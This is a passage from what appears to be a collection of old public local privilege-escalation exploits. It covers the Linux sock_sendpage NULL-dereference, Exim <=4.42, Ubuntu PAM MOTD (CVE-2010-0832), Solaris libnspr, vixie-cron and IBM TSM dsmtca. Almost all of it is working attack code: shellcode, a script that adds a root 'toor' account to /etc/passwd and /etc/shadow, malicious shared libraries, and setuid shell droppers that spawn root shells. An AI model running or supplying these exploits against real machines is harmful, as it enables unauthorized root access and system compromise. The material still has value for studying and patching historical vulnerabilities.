task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int
main(void)
{
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
Linux 2.4 and 2.6 kernel sock_sendpage() local root exploit for powerpc.
darkeagle/Exim <= 4.42 Local Root Exploit ( linux)
#!/bin/sh
# Local Lame R00T sploit for exim <= 4.42
# by Dark Eagle
#
# My First Coding Release In bash ))
# Unl0ck Research Team
#
# More Effective than C-code.
#
# @env.c content:
#
###################################################
# #include <stdio.h>
# #include <string.h>
# int main(int argc, char *argv[])
# {
# char *addr_ptr;
# addr_ptr = getenv(argv[1]);
# printf("%s @ %p\n", argv[1], addr_ptr);
# return 0;
# }
###################################################
gcc @env.c -o @env
cp @env /usr/bin
cd /usr/exim/bin
CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE
@env CODE
echo "So, dude, starting..."
echo "NoW Just Type Address Of CODE"
read ADDRESS
echo "You are typed: $ADDRESS"
echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"
./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`
# milw0rm.com [2005-02-07]
anonymous/Ubuntu PAM MOTD Local Root Exploit ( linux)
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu PAM MOTD local root
# [*] Backuped /home/user/.ssh/authorized_keys
# [*] SSH key set up
# [*] Backuped /home/user/.cache
# [*] spawn ssh
# [+] owned: /etc/passwd
# [*] spawn ssh
# [+] owned: /etc/shadow
# [*] Restored /home/user/.cache
# [*] Restored /home/user/.ssh/authorized_keys
# [*] SSH key removed
# [+] Success! Use password toor to get root
# Password:
# root@ubuntu:/home/user# id
# uid=0(root) gid=0(root) groupes=0(root)
#
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
backup() {
[ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
[ -e "$1" ] || return 0
mv "$1"{,.bak} || return 1
echo "[*] Backuped $1"
}
restore() {
[ -e "$1" ] && rm -rf "$1"
[ -e "$1".bak ] || return 0
mv "$1"{.bak,} || return 1
echo "[*] Restored $1"
}
key_create() {
backup ~/.ssh/authorized_keys
ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
echo "[*] SSH key set up"
}
key_remove() {
rm -f "$KEY"
restore ~/.ssh/authorized_keys
echo "[*] SSH key removed"
}
own() {
[ -e ~/.cache ] && rm -rf ~/.cache
ln -s "$1" ~/.cache || return 1
echo "[*] spawn ssh"
ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
[ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
echo "[+] owned: $1"
}
bye() {
key_remove
exit 1
}
KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
Marco Ivaldi/Solaris 10 libnspr constructor Local Root Exploit ( solaris)
#!/bin/sh
#
# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $
#
# raptor_libnspr3 - Solaris 10 libnspr constructor exploit
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Local exploitation of a design error vulnerability in version 4.6.1 of
# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to
# create or overwrite arbitrary files on the system. The problem exists
# because environment variables are used to create log files. Even when the
# program is setuid, users can specify a log file that will be created with
# elevated privileges (CVE-2006-4842).
#
# Yet another newschool version of the local root exploit: this time we place
# our code in the global constructor (ctors) for the library, as suggested by
# gera. This way, we don't have to hide a real function and we have a generic
# library that can be used in all exploits like this. To avoid annoying side-
# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing
# a library in the default search path.
#
# See also:
# http://www.0xdeadbeef.info/exploits/raptor_libnspr
# http://www.0xdeadbeef.info/exploits/raptor_libnspr2
#
# Usage:
# $ chmod +x raptor_libnspr3
# $ ./raptor_libnspr3
# [...]
# Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# # id
# uid=0(root) gid=1(other)
# # rm /usr/lib/secure/libldap.so.5
# #
#
# Vulnerable platforms (SPARC):
# Solaris 10 without patch 119213-10 [tested]
#
# Vulnerable platforms (x86):
# Solaris 10 without patch 119214-10 [untested]
#
echo "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
# prepare the environment
NSPR_LOG_MODULES=all:5
NSPR_LOG_FILE=/usr/lib/secure/libldap.so.5
export NSPR_LOG_MODULES NSPR_LOG_FILE
# gimme -rw-rw-rw-!
umask 0
# setuid program linked to /usr/lib/mps/libnspr4.so
/usr/bin/chkey
# other good setuid targets
#/usr/bin/passwd
#/usr/bin/lp
#/usr/bin/cancel
#/usr/bin/lpset
#/usr/bin/lpstat
#/usr/lib/lp/bin/netpr
#/usr/sbin/lpmove
#/usr/bin/su
#/usr/bin/mailq
# prepare the evil shared library
echo "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c
echo " setuid(0);" >> /tmp/ctors.c
echo " execle(\"/bin/ksh\", \"ksh\", 0, 0);" >> /tmp/ctors.c
echo "}" >> /tmp/ctors.c
gcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc
if [ $? -ne 0 ]; then
echo "problems compiling evil shared library, check your gcc"
exit 1
fi
# newschool LD_LIBRARY_PATH foo;)
unset NSPR_LOG_MODULES NSPR_LOG_FILE
LD_LIBRARY_PATH=/usr/lib/secure su -
# milw0rm.com [2006-10-24]
Michal Zalewski/vixie-cron Local Root Exploit ( linux)
#!/bin/sh
echo '.-------------------------------------------------------------------------.'
echo '| Marchew Hyperreal Industries ................... <marchew@dione.ids.pl> |'
echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |"
echo "\`--------------------------------- presents ------------------------------'"
echo
echo ' * another vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> * '
echo
echo '.-------------------------------------------------------------------------.'
echo '| This time, it is somewhat more complicated. On some systems, it might |'
echo '| require some tuning, to be slower, but resources-effective. It expects |'
echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file" |'
echo '| sooner or later, and spoofs the legitimate cron entry file with evil |'
echo '| content, thus leading to account compromise (usually: root compromise). |'
echo "\`-------------------------------------------------------------------------'"
echo
CYCLES=32768
DESTUSER=root
SHOULDTOOK=60
VCRON="`strings /usr/bin/crontab 2>/dev/null|grep -i vixie`"
if [ "$VCRON" = "" ]; then
echo "[-] Sorry, this box is not running vixie cron."
echo
exit 1
else
echo "[+] Found Paul Vixie's /usr/bin/crontab utility."
fi
if [ -r /var/spool/cron ]; then
echo "[+] This box has exploitable /var/spool/cron..."
else
echo "[-] Sorry, this box is not vulnerable to this attack."
echo
exit 1
fi
if [ -u /usr/bin/crontab ]; then
echo "[+] This box has setuid crontab utility..."
else
echo "[-] Sorry, this box has no setuid crontab."
echo
exit 1
fi
cat >dowrite.c <<_EOF_
main() {
lseek(1,0,0);
write(1,"* * * * * /tmp/.rootcron\n\n",26);
ftruncate(1,25);
}
_EOF_
echo "[+] Compiling helper application #1..."
gcc -o dowrite dowrite.c
if [ ! -f dowrite ]; then
echo "[-] Compilation failed."
echo
exit 1
fi
echo "[+] Application #1 compiled successfully."
echo "[+] Creating helper application #2..."
cat >/tmp/.rootcron <<_EOF_
#!/bin/sh
(
chown root.root /tmp/.r00tcr0n
chmod 6755 /tmp/.r00tcr0n
rm -f /var/spool/cron/tmp.*
crontab -r
) &>/dev/null
_EOF_
cat >root.c <<_EOF_
main() {
setuid(0); setgid(0);
unlink("/tmp/.r00tcr0n");
execl("/bin/bash","bash","-i",0);
perror("bash");
}
_EOF_
echo "[+] Compiling helper application #3..."
gcc -o /tmp/.r00tcr0n root.c
if [ ! -f /tmp/.r00tcr0n ]; then
echo "[-] Compilation failed."
echo
exit 1
fi
echo "[+] Application #3 compiled successfully."
X=0
if [ ! "$1" = "noprep" ]; then
echo "[*] Attack against user $DESTUSER, doing $CYCLES setup cycles..."
echo " Please be patient, setup might took some time; to skip it if"
echo " /var/spool/cron on this machine is already initialized, use"
echo " '$0 noprep'."
PROB=$[CYCLES*100/32768]
test "$PROB" -gt "100" && PROB=100
echo "[+] This gives almost $PROB% probability of success on the first attempt."
while [ "$X" -lt "$CYCLES" ]; do
X=$[X+1]
echo -ne "\r[?] Doing cycle $X of $CYCLES [$[X*100/CYCLES]% done]... "
umask 0
( ( crontab /dev/urandom & usleep 1000; killall crontab ) & ) &>/dev/null
done
sleep 3;killall -9 crontab &>/dev/null
echo
echo "[+] Setup complete, /var/spool/cron filled with junk tmp files."
CNT=0
echo "[*] Now, doing cleanup and counting the nodes..."
for i in 1 2 3 4 5 6 7 8 9; do
for j in /var/spool/cron/tmp.${i}*; do
echo -n >$j
echo -ne "\r[+] Node $CNT clean... "
CNT=$[CNT+1]
done
done
echo
PROB=$[CNT*100/32768]
echo "[+] Found $CNT nodes, approx. $PROB% chance..."
if [ "$CNT" -lt "$[CYCLES*2/3]" ]; then
echo "[-] Less than 66% of expected nodes were created. Try adjusting the exploit."
echo
exit 1
fi
else
echo "[?] Skipping /var/spool/cron initialization. Results might be unpredictable."
fi
echo "[+] Now I will wait for $DESTUSER to edit his crontab. Could take some time."
chmod 755 /tmp/.rootcron
while :; do
sleep 1
GOT="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep|cut -b10-15|head -1`"
test "$GOT" = "" && continue
GOT=`echo $GOT`
echo "[+] Caught victim at pid $GOT..."
if [ ! -f /var/spool/cron/tmp.$GOT ]; then
echo "[-] DAMN! We have no node for this pid, bad luck..."
continue
fi
echo '[+] Got this node :) Entering event wait loop...'
export DESTUSER
(
G=blabla
while [ ! "$G" = "" ]; do
G="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep`"
done
sleep 1
echo "[+] Bingo! It happened. Now writing our evil content..." 1>&2
./dowrite
) >/var/spool/cron/tmp.$GOT
echo '* * * * * /bin/true' >.ctab
echo "[+] Evil content written. Trying to rehash the daemon..."
crontab .ctab
crontab -r
echo "[+] Entering event loop waiting for exploit to work..."
while [ ! -u /tmp/.r00tcr0n ]; do
sleep 1
done
rm -f .ctab dowrite dowrite.c /tmp/.rootcron root.c
echo "[+] Calling the main code..."
/tmp/.r00tcr0n
echo "[*] Thank you for choosing Marchew Industries."
echo
exit 1
done
# milw0rm.com [2000-11-21]
Kryptos Logic/IBM Tivoli Storage Manager (TSM) Local Root ( linux)
http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca.txt
http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca-exploit.c
==-===-=====-=======-===========-=============-=================
IBM Tivoli Storage Manager (TSM) Local Root
Kryptos Logic, December 2010
==-===-=====-=======-===========-=============-=================
=====[ Timeline
Vendor Contacted...........: 2009-12-14
Fix from Vendor............: 2010-12-14
Advisory Published.........: 2010-12-15
=====[ Affected Versions
Vulnerable:
IBM TSM 6.1: 6.1.0.0 through 6.1.3.0
IBM TSM 5.5: 5.5.0.0 through 5.5.2.7
IBM TSM 5.4: 5.4.0.0 through 5.4.3.3
IBM TSM 5.3: 5.3.0.0 through 5.3.6.7
- Potentially older versions of IBM TSM dsmtca
Not vulnerable:
IBM TSM 6.1.4
IBM TSM 5.5.3
IBM TSM 5.4.3.4
IBM TSM 5.3.6.10
See IBM advisory IC65491 for details:
http://www.ibm.com/support/docview.wss?uid=swg21454745
=====[ Vulnerability
When IBM TSM communicates with the suid root backup client
dsmtca, it is handled through pipes. The function
GeneratePassword() does not perform boundary checking, which can
lead to a classic stack based buffer overflow - making local
code execution possible.
=====[ Exploitation
The LANG environment variable gets copied to a fixed location in
memory. An attacker can achieve arbitrary code execution by
placing his shellcode in the variable, and then overwrite the
return address of GeneratePassword() with the known address that
the value is copied to.
=====[ Credits
Discovered by Peter Wilhelmsen and Daniel Kalici, Kryptos Logic.
Exploit developed by Peter Wilhelmsen and Morten Shearman
Kirkegaard, Kryptos Logic.
=====[ About Kryptos Logic
Kryptos Logic is a group of talented computer security experts
from around the globe that has coalesced into a highly effective
team. We provide a wide range of security products ranging from
binary analysis, instrusion management systems, anti-piracy, and
digital rights management software. We also perform
state-of-the-art research on emerging attack vectors and threats
to current digital infrastructure.
http://www.kryptoslogic.com/
Exploit:
/*
* IBM Tivoli Storage Manager 6.1 - Local Root in DSMTCA GeneratePassword
* Copyright (C) 2009-2010 Kryptos Logic
*
* Bug discovered by Peter Wilhelmsen and Daniel Kalici.
* Exploit by Peter Wilhelmsen and Morten Shearman Kirkegaard.
*
* http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca.txt
* http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca-exploit.c
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <inttypes.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
"\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
enum arguments {
tcaProgramPath,
tcaDebugStop,
tcaAlertString,
tcaPipe0,
tcaPipe1,
tcaPipe2,
tcaPipe3,
tcaPswdFileName,
tcaLang,
tcaErrorLog,
tcaDsDir,
tcaRequest,
tcaSessID,
tcaServerName,
tcaPasswordFile,
tcaPasswordDir,
tcaBuildData,
tcaBuildTime,
tcaCliType,
tcaTraceTrusted,
tcaClusterEnabl,
tcaCryptoType,
tcaTerminate,
tcaArgCount
};
/* Find the buflen (56 in this case) in GeneratePassword().
*
* .text:0805B056 _Z16GeneratePasswordhiiP12pswdFileInfoPcS1_S1_S1_S1_ proc near
* ...
* .text:0805B155 lea eax, [ebp-56]
* .text:0805B158 mov [esp+4], eax ; buf
* .text:0805B15C mov [esp], edi ; fd
* .text:0805B15F call _read
*
*
* Set the retaddr (0x083C7100 in this case) to the Locale export.
*
* .data:083C7100 Locale db 55h dup(0) ; DATA XREF: .got:Locale_ptro
*/
struct {
char *name;
int buflen;
uint32_t retaddr;
} versions[] = {
{ "5.5.1.4-linux-i386", 40, 0x0826E7E0 },
{ "5.5.2.0-linux-i386", 40, 0x08278180 },
{ "6.1.0.0-linux-i386", 56, 0x08356520 },
{ "6.1.3.0-linux-i386", 56, 0x083C7100 },
{ NULL }
};
void SpawnTask(char *argv[])
{
pid_t pid;
signal(SIGCHLD, SIG_IGN);
pid = fork();
if (pid == -1) {
perror("fork() failed");
exit(EXIT_FAILURE);
}
if (pid != 0) {
return;
}
signal(SIGINT, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGQUIT, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGSEGV, SIG_IGN);
signal(SIGXFSZ, SIG_IGN);
signal(SIGTSTP, SIG_IGN);
signal(SIGABRT, SIG_IGN);
execv(argv[0], argv);
perror("execv() failed");
exit(EXIT_FAILURE);
}
void exploit(int v)
{
int pfd[2];
int cfd[2];
char p0[16];
char p1[16];
char p2[16];
char p3[16];
char buffer[64];
uint8_t len;
char *args[tcaArgCount];
len = versions[v].buflen + 8;
if (len > sizeof(buffer)) {
fprintf(stderr, "versions[%d].buflen > %d\n",
v, (int)sizeof(buffer));
exit(EXIT_FAILURE);
}
setenv("LANG", shellcode, strlen(shellcode));
if((pipe(pfd) == -1) || (pipe(cfd) == -1))
{
perror("pipe() failed");
exit(EXIT_FAILURE);
}
sprintf(p0, "%d", pfd[0]);
sprintf(p1, "%d", pfd[1]);
sprintf(p2, "%d", cfd[0]);
sprintf(p3, "%d", cfd[1]);
args[tcaProgramPath ] = "/opt/tivoli/tsm/client/ba/bin/dsmtca";
args[tcaDebugStop ] = "0";
args[tcaAlertString ] = "TCA Interr\bfacee\b ADSM Release 3";
args[tcaPipe0 ] = p0;
args[tcaPipe1 ] = p1;
args[tcaPipe2 ] = p2;
args[tcaPipe3 ] = p3;
args[tcaPswdFileName] = "/etc/adsm/TSM.PWD";
args[tcaLang ] = "/opt/tivoli/tsm/client/lang/en_US/dsmclientV3.cat";
args[tcaErrorLog ] = "/var/log/dsmerror.log";
args[tcaDsDir ] = "/opt/tivoli/tsm/client/ba/bin";
args[tcaRequest ] = "C";
args[tcaSessID ] = "NODE";
args[tcaServerName ] = "SERVER";
args[tcaPasswordFile] = "/etc/adsm/TSM.PWD";
args[tcaPasswordDir ] = "";
args[tcaBuildData ] = "AASATRG";
args[tcaBuildTime ] = "DMESEEG";
args[tcaCliType ] = "";
args[tcaTraceTrusted] = "0";
args[tcaClusterEnabl] = "0";
args[tcaCryptoType ] = "1";
args[tcaTerminate ] = (char *)NULL;
SpawnTask(args);
close(pfd[0]);
close(cfd[1]);
/* 0805A7BD call _read( fd, buf, 1 ) */
write(pfd[1], "\x41", 1);
/* 0805A7DD call _read( fd, var_AAA, 1 ) */
write(pfd[1], "\x41", 1);
/* 0805A7FD call _read( fd, var_5BB, 1 ) */
write(pfd[1], &len, 1);
/* 0805A824 call _read( fd, var_28, var_5BB ) */
memset(buffer, 'A', sizeof(buffer));
*(uint32_t *)(buffer + len - 4) = versions[v].retaddr;
write(pfd[1], buffer, len);
/* read the response, needed to make GeneratePassword() return */
read(cfd[0], buffer, sizeof(buffer));
close(pfd[1]);
close(cfd[0]);
}
void usage(char *path)
{
int i;
fprintf(stderr, "Usage: %s version\n", path);
fprintf(stderr, "\n");
fprintf(stderr, "Where \"version\" is one of:\n");
for (i=0; versions[i].name; i++) {
fprintf(stderr, "%s\n", versions[i].name);
}
}
int main(int argc, char *argv[])
{
int i;
if (argc != 2) {
usage(argv[0]);
return EXIT_FAILURE;
}
for (i=0; versions[i].name; i++) {
if (strcmp(argv[1], versions[i].name) == 0) {
exploit(i);
return EXIT_SUCCESS;
}
}
usage(argv[0]);
return EXIT_FAILURE;
}